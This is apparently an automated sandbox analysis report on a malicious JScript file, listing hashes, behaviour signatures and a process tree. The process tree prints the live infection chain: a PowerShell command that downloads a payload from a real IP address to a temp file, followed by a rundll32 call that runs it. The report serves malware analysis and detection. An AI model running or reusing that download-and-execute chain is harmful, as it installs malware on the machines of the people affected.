Overview

overview

8

Static

static

1

file_1.jse

windows7-x64

3

file_1.jse

windows10-2004-x64

8

Analysis

  • max time kernel
    90s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-02-2023 13:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file_1.jse

  • Size

    1KB

  • MD5

    dd01bc0f613fffd3e2bf784291b9c488

  • SHA1

    b3f84230e20ae2987389e8694e7b945dbcd970a0

  • SHA256

    b0339e18da6bfea0c60e388e631de79a83e2bc20880d6b9624d4784465a330b7

  • SHA512

    31021d482a8f12ba8cd7909d098e7b4c0043e7fc9caf8cdc1cad257b4cfeac1f713e056a0bfe8ab17069e6cb1d57f352633aedb751bbf7555c5f1a2b2adcaf90

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\file_1.jse"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2548
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\default.bat" nDLL"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4272
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell iwr -uri http://104.236.1.43/YXF/150223.gif -o C:\Users\Admin\AppData\Local\Temp\aTgzWLspf.tmp
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3540
      • C:\Windows\system32\rundll32.exe
        RunDLL32 C:\Users\Admin\AppData\Local\Temp\aTgzWLspf.tmp,Wind
        3⤵
          PID:1260

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\default.bat
      Filesize

      200B

      MD5

      8f52e9f41c41025a10831353a633760c

      SHA1

      c18042f92ca24fb84e3c90b9fa8a5cab193762b6

      SHA256

      b435653b9e1860cf38d78911eb7341c4b9c8e09af765b28a490ed269413eb2b1

      SHA512

      70b65eb28de8f5fbc1da87810f739fab4356136e17e39eac14c675a8c652f81e38dbb38c689b4d440ba0d16bd21b032007ac316725c0825a039eaff3fe2d1f2f

      Download Submit

    • memory/1260-138-0x0000000000000000-mapping.dmp

      Download

    • memory/3540-134-0x0000000000000000-mapping.dmp

      Download

    • memory/3540-135-0x000002104FFD0000-0x000002104FFF2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3540-136-0x00007FFDC0AD0000-0x00007FFDC1591000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3540-137-0x00007FFDC0AD0000-0x00007FFDC1591000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4272-132-0x0000000000000000-mapping.dmp

      Download